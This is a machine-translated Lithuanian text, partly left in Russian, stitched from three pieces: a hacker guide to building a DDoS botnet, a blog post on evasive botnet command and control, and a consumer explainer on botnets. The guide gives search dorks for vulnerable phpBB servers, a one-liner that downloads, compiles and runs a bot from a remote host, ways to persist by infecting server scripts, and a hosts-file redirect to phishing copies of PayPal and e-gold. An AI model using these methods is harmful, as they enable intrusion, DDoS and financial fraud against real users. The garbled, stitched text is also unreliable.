Mes kuriame savo kovinį botnetą. Koks turėtų būti idealus botnetas?

Apsaugos sistemos nuolat tobulinamos, programuotojai įgyja daugiau patirties. Dabar daroma vis mažiau gerai žinomų klaidų.

[prologas]
Internetas auga su milžiniška jėga. Įsilaužėliams darosi vis sunkiau rasti pažeidžiamumą. Kad apsaugotų savo produktus, administratoriai naudojasi šauniausiais saugos ekspertais. Ar atpažįstate savo mintis? Tiesą sakant, internetas yra pilnas pažeidžiamumų, tačiau iš jų mažai naudos. Na, tai priklauso nuo to, kaip į tai žiūrite, dabar įsivaizduokite situaciją, koks nors internetinis niekšas jus sujaudino, norite jį nubausti. Šiandien kalbėsime apie savo kovinio botneto kūrimą.
Taigi, kas yra „botas“. Neišmanančiam žmogui iš karto į galvą ateina kvaili priešininkai kompiuteriniuose žaidimuose, kuriuos nušauni per dvi minutes. Taip, tai iš dalies tiesa. Mūsų atveju „bot“ yra programa, kuri vykdo jame įdėtas komandas. Atrodo, nieko ypatingo. Kažkas paprieštaraus: „Aš tai parašiau, kai man buvo penkeri metai, tu paspaudi mygtuką ir programa, olla-la, užsidaro, pamirškime vaikystę. Visi žinome, kad kodavimo galimybės yra begalinės, ir tai gali būti panaudota tiek gėriui, tiek blogiui. Žinoma, mes visada naudojame savo patobulinimus turėdami gerus ketinimus. „Botnet“ yra viename centre surinktų robotų rinkinys, kuris vienu metu vykdo savininko komandas. Beje, robotai daugiausia skirti „Windows“ įrenginiams. Čia galite pavogti savo slaptažodžius, įdiegti „Sox“ ir suformatuoti varžtą. Aš nukrypsiu nuo taisyklių ir pasakysiu, kaip sukurti „botnet“ iš „Nix“ mašinų. Pagrindinė mūsų roboto funkcija yra organizuoti DDOS atakas. Tai idealus būdas išnaudoti plačius nix serverių kanalus. Paskaičiuokime. Serveris, kurį reikia „atsisiųsti“, yra 100 Mb kanale. Tai yra, 10-20 botų, stovinčių tame pačiame kanale, akimirksniu užvaldys serverį. Jei galite pasislėpti už ugniasienės nuo vieno serverio, tada, deja, nuo daugiau botų nepabėgsite

[Parašykite robotą]
Pavyzdinio roboto sąrašą rasite paspaudę straipsnio pabaigoje esančią nuorodą. Pažiūrėkime šiek tiek į kodą. (Uh, Dream vėl viską valdo per IRC? Tai šauniau per WEB!). Beje, valdymas per IRC pasirinktas dėl jo interaktyvumo. Tarkime, noriu panaudoti vietinius branduolinius išnaudojimus, kad užpulčiau porą serverių botnete. Aš tiesiog vykdysiu komandą SH uname -a naudodamas botą ir akimirksniu surasiu reikiamą kompiuterį. Tada, taip pat vykdydamas komandą IRC kliente, atsisiųsiu backdoor ir gausiu interaktyvų apvalkalą tolesniems veiksmams. Galimybės yra neribotos. Sakysite, kad tokią kontrolę galima įgyvendinti per WEB, bet kam iš naujo įkelti puslapį ir švaistyti srautą? Kur kas patogiau viską stebėti realiu laiku (nors turint daugiau nei 1000 botų robotų tinklą galima pasirūpinti sąsajos patogumu – sveiko proto pastaba). Daugelis žmonių mano, kad DDOS organizavimas yra labai sudėtingas dalykas. Čia yra tipinio atakos kodo pavyzdys:

GET /server.org HTTP/1.0\r\nRyšis: Keep-Alive\r\nVartotojo agentas: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nPagrindinis kompiuteris: server.org:80\r\nPriimti: vaizdas/gif, vaizdas/x-xbitmap, vaizdas/jpeg, vaizdas/pjpeg, vaizdas/png, */*\r\nAccept-Encoding: gzip\r\nPriimti-Kalba: en\r\nPriimti-Charset: iso- 8859-1,*,utf-8\r\n\r\n

Tai yra, mes tiesiog siunčiame užklausą serveriui, priversdami jį atsakyti. Ir siunčiame, kol serveris sugenda dėl srauto ar procesoriaus laiko trūkumo. Bet ar apsiribosite vien „nix“ robotais. Taip pat reikia sukurti „Windows“ robotų tinklą, pagrįstą „AgoBot“? Norėdami tai padaryti, galite sukurti tam tikrą roboto kodą, kuris nuskaitys lsasl/dcom įrenginių, jungiančių prie serverio, kuriame įdiegtas robotas, pažeidžiamumą.

[botneto kūrimas]
Sukurti botnetą iš tikrųjų labai paprasta. Norėdami tai padaryti, turime rasti bet kurio žiniatinklio scenarijaus pažeidžiamumą. Rastas pažeidžiamumas turėtų leisti vykdyti apvalkalo interpretatoriaus komandas. Radę pažeidžiamumą, atkreipkite dėmesį į pagrindinio failo pavadinimą, jo pavadinimą ir pažeidžiamos sistemos pavadinimą. Dabar, naudodami šiuos duomenis, turite sukurti gerą paieškos užklausą. Pavyzdžiui, paimkime gerai žinomą phpBB pažeidžiamumą<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") arba kitas; spausdinti $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n"; @resu =<$sock>; uždaryti($kojinė);

Wget http://server.org/bot.c;gcc bot.c -o bash;chmod +x bash;./bash;

Čia galite pamatyti dvi problemas vienu metu. wget ir gcc gali būti nepasiekiami arba jų naudojimas bus draudžiamas. Čia mums padės fech, curl ir get downloads arba lynx konsolės naršyklė, arba galime naudoti ftp protokolą. Jo įgyvendinimas yra sudėtingesnis, tačiau privalumas yra tas, kad ftp yra visur. - Perl arba PHP. Kiekvienas metodas turi savo privalumų ir trūkumų, kurį pasirinkti, galite pasirinkti. Esu įpratęs maksimaliai išnaudoti užfiksuotą serverį. Juk robotas nix serveryje veiks tik iki pirmojo mašinos perkrovimo. Yra viena įdomi išeitis iš šios situacijos. Botas ieškos interpretuojamų failų (.pl, .php), kuriuos galima rašyti, ir pridės prie jų kodą, skirtą roboto atsisiuntimui ir paleidimui. Arba galite sukurti kitą „Windows“ robotų tinklą. Tai taip pat lengva įgyvendinti. Čia mums reikia interneto naršyklės (Internet Explorer, Opera, Mozilla) pažeidžiamumo, dėl kurio atsisiunčiamas ir paleidžiamas norimas failas. Tada sukuriamas infrastruktūros įrašas, kuris įkelia mūsų kenkėjišką kodą. Šis įrašas pridedamas prie visų indekso failų (arba prie visų kur yra html kodas, viskas priklauso nuo jūsų arogancijos). Nedidelis scenarijus Haz, kurį taip pat rasite archyve, puikiai atlieka šį darbą. Klaidų takelis užpildytas svarbių „Internet Explorer“ spragų įrašais, todėl „Windows“ sistemose taip pat turėsime robotų tinklą (jo pranašumus paminėjau aukščiau). Tai viskas, paleiskite mūsų paieškos kirminą ant didelio greičio apvalkalo, išgerkite kavos (alaus, degtinės, pomidorų sulčių), eikite į IRC kanalą, nurodytą boto savybėse ir stebėkite savo pavaldinių skaičių. Baigdamas noriu pasveikinti visus mane pažįstančius ir palinkėti sėkmės. Nesusigauk.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX

Pažeidžiamumas phpBB yra aktualus iki 2.0.16 versijos, nors kūrėjai teigia, kad jie ją ištaisė 2.0.11 versijoje

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Sukčiavimas
Labai patogu naudoti robotus kaip sukčiavimo organizaciją. Norėdami tai padaryti, mums reikia specialių puslapių, skirtų sukčiavimui, kurie imituoja mums reikalingą svetainę ir gerą prieglobą, skirtą serverį arba VDS. Tokius puslapius galite pasidaryti patys, nusipirkti arba rasti internete. Pasirinkimas didžiulis. Dažniausiai sukčiavimas organizuojamas svetainėse: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om ir kitose, vienaip ar kitaip susijusiose su elektronine prekyba. Tada „Windows“ robotas perrašo failą \system32\drivers\etc\hosts, pridėdamas prie jo jūsų serverio IP adresą ir priskirdamas jam reikalingą svetainės slapyvardį. Failo formatas yra:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Tai yra, naršyklėje įvedęs svetaines e-gold.com ir paypal.com, vartotojas nieko neįtardamas patenka į mūsų serverį. Savo ruožtu sukčiavimo serveryje įrašai apie atitinkamus domenus pridedami prie httpd.conf.

DocumentRoot "/home/e-gold.com/www" Serverio pavadinimas "www.e-gold.com" ServerAlias ​​​​"e-gold.com" "www.e-gold.com"

Žinoma, naršyklės eilutėje bus žinomas e-gold.com adresas, ir net pažengęs vartotojas nieko neįtardamas prisijungs prie svetainės. Norėdami užbaigti paveikslėlį, pasakysiu, kad jei vartotojas naudoja tarpinį serverį, šis metodas neveiks

Botai kiekvienam skoniui
Agobot/Phatbot/Forbot/XtremBot
Tai geriausia robotų šeima. Parašyta C++. Jie turi daug apsaugos nuo aptikimo funkcijų ir daugiau nei 500 modifikacijų dėl aiškiai apibrėžtos modulinės struktūros.
SDBot/RBot/UrBot/UrXBot
Botai, kurie šiuo metu yra labai populiarūs vykdyti DDOS atakas. Jie turi daug papildomų funkcijų. Tokie kaip „Sock4“ atidarymas, „keylogger“, automatinis lsass ir dcom spragų skaitytuvas. Ji taip pat turi funkciją peradresuoti užklausas į antivirusinių įmonių svetaines į vietinį serverį, redaguojant \system32\drivers\etc\hosts ir įdiegiant nedidelį netikrą žiniatinklio serverį 80 prievade.
DSNX robotai
Šis robotas gali vykdyti DDOS atakas, prievadų nuskaitymą ir kai kurias kitas smulkmenas.
Q8 Botai
Puikus robotas nix sistemoms. Jis išsiskiria kompaktišku kodu (27 KB, susideda iš vieno failo) ir geru funkcionalumu. Galima dinamiškai atnaujinti atsisiunčiant ir paleidžiant naują failą. Puikiai įgyvendina pagrindinius DDOS diegimus (SYN-flod, UDP-Flood). Geba vykdyti sistemos komandas. Jis taip pat gerai maskuojasi sistemoje.
kaiten
Taip pat geras robotas Unix/Linux sistemoms. Gali atidaryti nuotolinį apvalkalą užfiksuotame serveryje.
Perl pagrindu veikiantys robotai
Tai labai maži robotai, parašyti Perl. Naudojamas DDOS atakoms prieš Unix pagrindu veikiančias sistemas.

---
Straipsnis labai linkęs įsilaužti, todėl jei neaišku, paklauskite.

Ne veltui paskelbiau savo užrašo apie lygiaverčius tinklus juodraštį. Skaitytojų komentarai buvo labai naudingi. Jie mane įkvėpė toliau dirbti šia kryptimi. Kas iš to išėjo – pažiūrėkite po pjūviu.

Kaip rodo įrašo pavadinimas, šiandien kalbėsime tik apie botnetus. Kuriam laikui pamirškime apie failų bendrinimą, tarpinio serverio tinklus, lygiaverčius tinklaraščius ir p2p valiutą.

Žodis „botnetas“ neturėtų būti suprantamas kaip kažkas neteisėto. Kai vartotojas savanoriškai atsisiunčia ir įdiegia „bot“, kad paaukotų savo srautą ir skaičiavimo išteklius mokslinio projekto poreikiams, tai taip pat yra robotų tinklas. Atitinkamai, botmaster nebūtinai yra nusikaltėlis. 30 mokslininkų grupė, dalyvaujanti moksliniame projekte, taip pat yra „botmaster“.

1. Botneto valdymas per serverį

Lengviausias būdas valdyti robotus yra paleisti irc/http serverį. Per jį robotai gaus komandas ir su jo pagalba išsiųs jų vykdymo rezultatą.

Piešiu kaip galiu :) Šiuo atveju iliustracijos gal ir neprireiks, bet nusprendžiau jus paruošti šokui, kurį sukels likę piešiniai.

  • Labai paprastas įgyvendinimas, ypač IRC atveju.
  • Greitas atsakymas iš robotų.
  • Galite duoti komandas visam tinklui arba konkrečiam robotui.
  • Jei tinklą sudaro šimtai mazgų, jam valdyti pakanka vieno DalNet kanalo. Didesniuose tinkluose galite nusipirkti nebrangų (apie 300 rublių per mėnesį) žiniatinklio prieglobą.
  • HTTP atveju- serveris labai supaprastina gražios vartotojo sąsajos kūrimą. Tai svarbu, jei kurioje nors žiniatinklio paslaugoje naudojame robotų tinklą.
  • Serverio apkrova. Didžiausių robotų tinklų mazgų skaičius matuojamas milijonais. Norint valdyti tokią minią, neužtenka vieno serverio.
  • Jei kas nors atsitiks serveriui (tinklo gedimas, DDoS, gaisras duomenų centre), tinklas nutrūks.
  • Vieną serverį lengva užkardyti. Tai gali padaryti tiek teikėjas, tiek „Kaspersky Lab“ produktai vartotojo kompiuteryje.
  • „Botmaster“ yra gana lengva rasti. Kartą pamiršau apie VPN – laukite svečių su uniforma.
  • IRC atveju, komandas gauna tik internetiniai robotai. Jei robotas įeina į kanalą praėjus dviem minutėms po komandos išsiuntimo, tai bus „ne į temą“.
  • Botų skaičių ir jų IP galima nustatyti apsilankius IRC kanale. Kanalo apsauga slaptažodžiu nepadės, nes pastarąjį lengva išsirinkti iš boto kodo.

2. Valdymas per IRC tinklą

Logiškas žingsnis siekiant kovoti su ankstesnio metodo trūkumais yra padaryti ne vieną serverį, o kelis. Mano nuomone, lengviausias būdas tai padaryti yra padidinti savo IRC tinklą. Tokiu atveju visa atsakomybė už duomenų perdavimą tarp serverių tenka IRC protokolui. Boto pusėje nebus jokio skirtumo, palyginti su ankstesniu sprendimu.

  • Paprastas įgyvendinimas, nors turėsite padirbėti nustatydami serverius.
  • Botai vis tiek greitai reaguoja į komandas.
  • Vis tiek galite duoti komandas konkrečiam robotui.
  • Apkrovos paskirstymas tarp serverių, apsauga nuo DDoS ir force majeure. Keliolikos gerų serverių gali pakakti milijono robotų tinklui.
  • Jei kai kurie serveriai sugenda, galite turėti laiko juos pakeisti.
  • Jei naudojate IRC ir yra supainiotas dėl tūkstančio botų, sėdinčių viename kanale, naudokite kelis kanalus. Atitinkamai, skirtingoms tinklo dalims galite suteikti skirtingas užduotis.
  • Turėsite daugiau skirti serveriams / VDS.
  • Užkardą galite naudoti visuose serveriuose vienu metu ir botmaster neturės laiko jų pakeisti.
  • Botmaster vis dar gana lengva susekti.
  • IRC atveju, robotų skaičius ir jų IP vis dar matomi.
  • Botai, kurie ką tik įėjo į kanalą, nėra temoje.

Pirmą kartą terminą pasitikėjimas išgirdau iš savo draugo Nickolo komentaruose prie ankstesnio įrašo. Kalbame apie „serverių“ funkcijos priskyrimą „botneto“ daliai.

  • Nereikia jokių serverių.
  • Pasitikėjimą gali sudaryti šimtai mazgų. Pakelti ir valdyti tokį skaičių irc/http serverių nėra lengva.
  • Botai neturėtų būti nuolat susiję su pasitikėjimu. Pakanka kartą per 5-10 minučių patikrinti, ar neatsirado naujų komandų. Kiekviena komanda turi turėti TTL, kurios metu ji išsaugoma pasitikėjimo režimu.
  • Didelis „serverių“ skaičius užtikrina tinklo atsparumą bet kokioms nelaimėms. Kai dalis žiedo miršta, botmaster gali duoti komandą sukurti naują trastringą. Arba tai gali padaryti patys žiediniai mazgai (reikalingi skaitmeniniai parašai ir tam tikros patikėtinių dalies sutikimas).
  • Tegul pasitikėjimą sudaro 512 mazgų, mažiausiai 50% yra nuolat prisijungę. Jei tinkle yra 1 000 000 robotų ir kiekvienas iš jų nuolat prisijungęs, viename patikimame mazge bus mažiau nei 4 000 robotų. Kai robotas reikalauja komandų (arba siunčia rezultatą) kartą per 10 minučių, kiekvienas žiedinis mazgas vienu metu apdoros vidutiniškai 7 ryšius. Gana mažai tokio dydžio tinklui, tiesa?
  • Tik botmaster gali gauti tikslų visų robotų sąrašą.
  • Galite duoti komandas konkrečiam robotui arba robotų grupei.
  • Greitas robotų atsakas į komandas.
  • „Botmaster“ sunku rasti.

Vienintelis neigiamas dalykas, kurį matau, yra įgyvendinimo sudėtingumas.

4. Peer-to-peer tinklai

Interneto šaltinių teigimu, P2P botnetai šiuo metu yra labai populiarūs. Tarp šių šaltinių jis nusipelno didžiausio dėmesio. Kiekvienas tokio tinklo mazgas žino tik keletą „gretimų“ mazgų. Botmaster siunčia komandas keliems tinklo mazgams, po kurių jos perduodamos iš kaimyno kaimynui.

Kaimynų sąrašas duodamas botams vieną kartą specialiame serveryje. Tai gali būti, pavyzdžiui, įsilaužta svetainė. Serveris nieko nedaro, jo reikia tik pridedant mazgus prie robotų tinklo.

  • Įgyvendinimas yra šiek tiek paprastesnis nei ankstesnėje pastraipoje.
  • Minimali visų tinklo mazgų apkrova. Botneto dydis praktiškai neribojamas.
  • Atsparus DDoS, mazgų išjungimams ir kt. Beveik neįmanoma užkardyti p2p botneto.
  • Nėra nuolatinių ryšių, kaip yra su IRC.
  • Mums reikia serverio, net jei tik trumpam.
  • Mazgai retkarčiais miršta, o tai turi įtakos tinklo ryšiui.
  • Norėdami gauti visų robotų sąrašą, turite, pavyzdžiui, duoti jiems komandą pasiekti konkrečią svetainę. Šiuo atveju nėra garantijos, kad sąrašą gaus tik botmaster.
  • Norėdami duoti komandą konkrečiam mazgui, turite ją išsiųsti visam tinklui arba prisijungti prie mazgo tiesiogiai.
  • Lėtas robotų atsakas į komandas.
  • Norėdami išsiųsti „ilgą“ komandą, pavyzdžiui, su URL sąrašu, turite naudoti trečiosios šalies serverį, kitaip robotų atsakas dar labiau sulėtės.
  • Lengviau rasti botmaster nei ankstesniame pavyzdyje, nes naudojamas koks nors serveris.

Žinoma, galiu klysti, bet mano nuomone, p2p botnetai yra daug blogiau nei pasitikėjimas. Gal antivirusų gamintojai kažką nutyli?

5. Pilnas sprendimas

Vienas iš būdų išrasti ką nors naujo ir gero – sukryžminti ką nors seno. Sujungėme telefoną, kompiuterį, magnetofoną, fotoaparatą ir vaizdo kamerą – gavome išmanųjį telefoną. Kompiuteris ir klimato kontrolė automobilyje nieko nebestebins. Prie kiekvieno jogurto priklijuokime po magnetuką ant šaldytuvo, ir pardavimai pakils į viršų.

Svarbu atsiminti, kad jei kirtimas bus nesėkmingas, galime gauti asmenį, kuris nieko gero. Man primena genetinius algoritmus, ar ne? Paimkime iš pažiūros gerą idėją – p2p botnetą, kur pasitikėjimas yra atsakingas už kaimynų paskyrimą. Tada mums nereikia jokio serverio!

Tačiau šiuo atveju įgyvendinimo sudėtingumas padidės, nors ir šiek tiek. Likusios p2p botneto problemos liks neišspręstos. Pergalė nereikšminga, rezultatas 1:1.

Kurį laiką pasėdėjęs su lapeliu ir pieštuku sugalvojau tokią idėją. Kiek žinau, tai dar niekada nebuvo įgarsinta ir tokia mintis man kyla pirmas. ChSV plius 100.

Ką daryti, jei tinkle yra dvi būsenos - „aktyvus“ ir „pasyvus“. Pasyvioje būsenoje botnetas veikia pagal p2p schemą. Botmaster siunčia komandą „mobilizuoti kariuomenę“ ir tinklas virsta pasitikėjimu. Savo komandoje botmaster turi nurodyti patikimus mazgus ir laiką, per kurį tinklas keičia savo būseną. Kad žiedas būtų didesnis, keliems robotams galite nurodyti savo kaimynus. Be to, visos komandos perduodamos pasitikėjimo būdu. Jis taip pat atsakingas už „kaimynų“ priskyrimą naujiems mazgams. Jei vėliau paaiškėja, kad žiedo TTL nepakanka, galima duoti komandą „pratęsti aktyvią būseną“.

Toks botnetas nepaveldės jokių p2p tinklo trūkumų ir turės visus pasitikėjimo privalumus, taip pat:

  • Padidėjęs atsparumas DDoS atakoms ir tinklo filtrams, pavyzdžiui, p2p tinklui.
  • Minimalus robotų išteklių suvartojimas tinklo prastovos metu. Botmasteriui nereikia stebėti pasitikėjimo būsenos ir pasirinkti naujų mazgų.
  • Kuriant patikimą, pasirenkami tik tie mazgai, kurie šiuo metu yra prisijungę. Botai prie žiedo prisijungs pirmuoju bandymu (tam tikrą laiką).
  • „Kaimynų“ sąrašas periodiškai atnaujinamas. Vis dėlto visas robotų tinklas žino mazgų, įtrauktų į laikinąjį žiedą, IP. Taigi tegul jie laiko šiuos mazgus kaimynais, jei kai kurie tikrieji kaimynai ilgą laiką nepasirodė tinkle.

Ir vienintelis trūkumas, kurį čia matau, yra įgyvendinimo sudėtingumas. Bet tai tikrai nėra problema.

6. Ką reikia atsiminti

Iki šiol apie kai kuriuos dalykus nutylėjau, nes jie būdingi bet kuriam iš įvardintų botneto valdymo metodų. Turėtumėte į juos atkreipti dėmesį.

  • Kai kurie mazgai negali priimti įeinančių ryšių dėl ugniasienės arba NAT. Į tai reikia bent jau atsižvelgti rašant robotą. Pavyzdžiui, platindamas komandas p2p tinkle, pats robotas turi periodiškai susisiekti su savo kaimynais, o ne laukti komandų iš jų.
  • Reikėtų manyti, kad yra klausomos visos į tinklą siunčiamos komandos. Šiems tikslams suinteresuotoji šalis gali modifikuoti bent jau roboto kodą. Tačiau prasminga užšifruoti visą tinkle siunčiamą srautą. Tai bent jau apsunkins botneto analizę.
  • Visos „botmaster“ komandos turi būti pasirašytos skaitmeniniu būdu. Slaptažodžiai nėra geri, nes juos galima perimti.
  • Kadangi kalbame apie diegimą, atkreipiu dėmesį, kad bet kuris botnetas turi turėti bent tris komandas – atnaujinti botus, atnaujinti botmaster raktą ir savaime sunaikinti visą tinklą.
  • Tinkle yra „šnipų“ mazgų. Kai kurie iš jų yra įtraukti į pasitikėjimą. Tuo pačiu metu nežinome, kokių tikslų siekia šie „šnipai“ – tai gali būti „botmaster“ IP identifikavimas, komandų vykdymo sutrikimas, tinklo išjungimas, „botneto“ valdymo įgijimas ir pan. Tiksliau, tai reiškia, kad robotai, jungdamiesi prie žiedo, turi pasirinkti atsitiktinį mazgą, o ne visą laiką naudoti tą patį.
  • Paveiksle pasitikintys mazgai yra sujungti vienas su kitu, tačiau daug praktiškiau žiedą įdiegti mažo p2p tinklo pavidalu, tai yra pagal „kaimynų“ principą.

Taip pat atkreipsiu dėmesį į tai, kad 1 ir 2 sprendimai (serveris, daug serverių) praranda daugybę savo trūkumų ir įgyja porą privalumų iš 3 sprendimo (trastring) naudojant HTTP protokolą. Dar kartą slinkite per šiuos taškus, kad pamatytumėte, ką turiu omenyje.

7. Išvados

Mažiems tinklams geras sprendimas yra naudoti IRC. Pavyzdžiui, jei norite sukurti savo nedidelį tinklą paskirstytam skaičiavimui, įdiekite robotą savo namų kompiuteryje, nešiojamajame kompiuteryje, netbook, darbo kompiuteryje (jei tai leidžia įmonės politika) ir valdykite tinklą per DalNet. Jei reikia, vėliau tinklą galima „perpumpuoti“ į pasitikėjimą. Jūs duosite atitinkamą komandą, tiesa?

Jei botnetui reikia gražios žiniatinklio sąsajos, gali būti prasminga parašyti papildomą programą, kuri paims komandas iš žiniatinklio serverio ir nusiųs jas į IRC. Bent jau apsvarstykite šį metodą.

Universalūs sprendimai yra patikimi ir p2p+trastring. Tokie tinklai veiks puikiai, nesvarbu, kiek mazgų jie turi, 1 ar 1 000 000, be jokių serverių.

Dėl akivaizdžių gryno p2p trūkumų, palyginti su žiedu, man lieka neaišku, kodėl jis laikomas geru sprendimu. Be abejo, tinklą sudarantys robotai turi daug naudingų funkcijų. Kodėl nepridėjus dar vienos mažos naudingosios apkrovos – tinklo mobilizavimo į pasitikėjimą?

Tai turbūt ir viskas. Man bus malonu pamatyti bet kokius jūsų komentarus. Ypač su kritika, nurodant teksto netikslumus/prieštaravimus ir savo mintis iškelta tema.

Šiandien botnetai tapo vienu iš pagrindinių kibernetinių nusikaltėlių įrankių. „ComputerBild“ jums pasakys, kas yra „botnetai“, kaip jie veikia ir kaip apsaugoti kompiuterį nuo patekimo į zombių tinklą.

Botnetas arba zombių tinklas yra kompiuterių, užkrėstų kenkėjiška programa, tinklas, leidžiantis užpuolikams nuotoliniu būdu valdyti kitų mašinas be jų savininkų žinios. Pastaraisiais metais zombių tinklai tapo stabiliu kibernetinių nusikaltėlių pajamų šaltiniu. Nuolat mažos sąnaudos ir minimalios žinios, reikalingos botnetų valdymui, prisideda prie populiarumo, taigi ir botnetų skaičiaus augimo. Užpuolikai ir jų klientai uždirba tūkstančius dolerių iš DDoS atakų ar šlamšto laiškų, vykdomų naudojant zombių tinklus.

Ar mano kompiuteris užkrėstas robotu?

Į šį klausimą atsakyti nelengva. Faktas yra tas, kad beveik neįmanoma atsekti robotų trukdžių kasdieniniam kompiuterio veikimui, nes tai jokiu būdu neturi įtakos sistemos veikimui. Nepaisant to, yra keletas požymių, pagal kuriuos galite nustatyti, kad sistemoje yra robotas:

Nežinomos programos bando prisijungti prie interneto, apie ką periodiškai pasipiktinusi užkarda ar antivirusinė programinė įranga praneša;

Interneto srautas tampa labai didelis, nors internetu naudojatės labai taupiai;

Vykdomų sistemos procesų sąraše atsiranda naujų, prisidengiančių kaip įprasti Windows procesai (pavyzdžiui, robotas gali būti pavadintas scvhost.exe – šis pavadinimas labai panašus į Windows sistemos proceso pavadinimą svchost.exe; tai gana sunku pastebėti skirtumą, bet tai įmanoma).

Kodėl kuriami botnetai?

Botnetai sukurti tam, kad užsidirbtų pinigų. Yra kelios komerciškai pelningos zombių tinklų naudojimo sritys: DDoS atakos, konfidencialios informacijos rinkimas, šlamšto siuntimas, sukčiavimas, šlamšto paieška, paspaudimų skaitiklių apgaudinėjimas ir kt. Reikėtų pažymėti, kad bet kokia užpuoliko pasirinkta kryptis bus pelninga. Botnetas leidžia atlikti visas aukščiau nurodytas veiklas vienu metu.

DDoS ataka (iš anglų kalbos Distributed Denial-of-Service) – tai ataka prieš kompiuterinę sistemą, pavyzdžiui, svetainę, kurios tikslas – sugadinti sistemą, ty į būseną, kurioje ji gali nebepriima ir neapdoroja teisėtų vartotojų užklausų. Vienas iš labiausiai paplitusių DDoS atakų vykdymo būdų yra daugybės užklausų siuntimas nukentėjusiam kompiuteriui ar svetainei, dėl ko paslauga atsisakoma, jei užpulto kompiuterio išteklių nepakanka visoms gaunamoms užklausoms apdoroti. DDoS atakos yra didžiulis įsilaužėlių ginklas, o botnetas yra ideali priemonė joms vykdyti.

DDoS atakos gali būti ir nesąžiningos konkurencijos, ir kibernetinio terorizmo priemone. Botneto savininkas gali suteikti paslaugą bet kuriam ne per daug skrupulingam verslininkui – įvykdyti DDoS ataką savo konkurento svetainėje. Po tokios apkrovos atakuojamas resursas „nukris“, užpuolikas gaus laikiną pranašumą, o kibernetinis nusikaltėlis gaus kuklų (arba nelabai) atlygį.

Lygiai taip pat ir patys botnetų savininkai gali panaudoti DDoS atakas pinigų iš didelių įmonių išvilioti. Tuo pačiu metu įmonės nori paklusti kibernetinių nusikaltėlių reikalavimams, nes sėkmingų DDoS atakų pasekmių pašalinimas yra labai brangus. Pavyzdžiui, 2009 m. sausį vienas didžiausių prieglobos serverių GoDaddy.com patyrė DDoS ataką, dėl kurios tūkstančiai jos serveriuose priglobtų svetainių buvo nepasiekiamos beveik parą. Šeimininko finansiniai nuostoliai buvo didžiuliai.

2007 m. vasarį buvo įvykdyta virtinė atakų prieš šakninius DNS serverius, nuo kurių veikimo tiesiogiai priklauso normalus viso interneto veikimas. Mažai tikėtina, kad šių atakų tikslas buvo sugriauti World Wide Web, nes zombių tinklų egzistavimas įmanomas tik tada, kai internetas egzistuoja ir veikia normaliai. Labiausiai tai buvo tarsi zombių tinklų galios ir galimybių demonstravimas.

DDoS atakų paslaugų skelbimai atvirai skelbiami daugelyje atitinkamų forumų. Atakų kainos svyruoja nuo 50 iki kelių tūkstančių dolerių už nepertraukiamo DDoS botneto veikimo dieną. Svetainės www.shadowserver.org duomenimis, 2008 metais buvo įvykdyta apie 190 tūkstančių DDoS atakų, iš kurių kibernetiniai nusikaltėliai galėjo uždirbti apie 20 mln. Natūralu, kad į šią sumą neįeina pajamos iš šantažo, kurių suskaičiuoti tiesiog neįmanoma.

Konfidencialios informacijos rinkimas

Vartotojų kompiuteriuose saugoma konfidenciali informacija visada pritrauks užpuolikus. Didžiausią susidomėjimą kelia kredito kortelių numeriai, finansinė informacija ir įvairių paslaugų slaptažodžiai: pašto dėžutės, FTP serveriai, momentiniai pasiuntiniai ir kt. Tuo pačiu metu šiuolaikinės kenkėjiškos programos leidžia užpuolikams pasirinkti būtent tuos duomenis, kurie jiems yra įdomūs – tai padaryti, tiesiog įkelkite jį į atitinkamą kompiuterio modulį.

Užpuolikai gali parduoti pavogtą informaciją arba panaudoti ją savo naudai. Daugelyje interneto forumų kasdien pasirodo šimtai skelbimų apie banko sąskaitų pardavimą. Sąskaitos kaina priklauso nuo pinigų sumos vartotojo sąskaitoje ir svyruoja nuo 1 USD iki 1500 USD už paskyrą. Apatinė riba rodo, kad konkurencijos metu kibernetiniai nusikaltėliai, užsiimantys tokiu verslu, yra priversti mažinti kainas. Norint tikrai daug uždirbti, jiems reikia stabilaus šviežių duomenų antplūdžio, o tam reikalingas stabilus zombių tinklų augimas. Finansinė informacija ypač įdomi kortuotojams – nusikaltėliams, užsiimantiems banko kortelių padirbinėjimu.

Kiek pelningos tokios operacijos, galima spręsti iš gerai žinomos grupės Brazilijos kibernetinių nusikaltėlių, kurie buvo suimti prieš dvejus metus. Iš paprastų vartotojų banko sąskaitų, pasinaudoję iš kompiuterių pavogta informacija, jie sugebėjo išsiimti 4,74 mln. Nusikaltėliai, užsiimantys dokumentų klastojimu, netikrų banko sąskaitų atidarymu, neteisėtų operacijų atlikimu ir pan., taip pat yra suinteresuoti gauti asmens duomenis, kurie nėra tiesiogiai susiję su vartotojo pinigais.

Kitas informacijos tipas, kurį renka robotų tinklai, yra el. pašto adresai ir, skirtingai nei kredito kortelių ir sąskaitų numeriai, daug el. pašto adresų galima išgauti iš vieno užkrėsto kompiuterio adresų knygos. Surinkti adresai pateikiami parduoti, kartais „masiškai“ - megabaitais. Pagrindiniai tokių „produktų“ pirkėjai yra šiukšlių siuntėjai. Milijono elektroninio pašto adresų sąrašas kainuoja nuo 20 iki 100 dolerių, o pašto siuntų platintojams tais pačiais milijonais adresų užsakytos siuntos – 150–200 dolerių. Nauda akivaizdi.

Nusikaltėlius domina ir įvairių mokamų paslaugų sąskaitos, internetinės parduotuvės. Žinoma, jos yra pigesnės nei banko sąskaitos, tačiau jų įgyvendinimas siejamas su mažesne teisėsaugos institucijų patraukimo baudžiamojon atsakomybėn rizika.

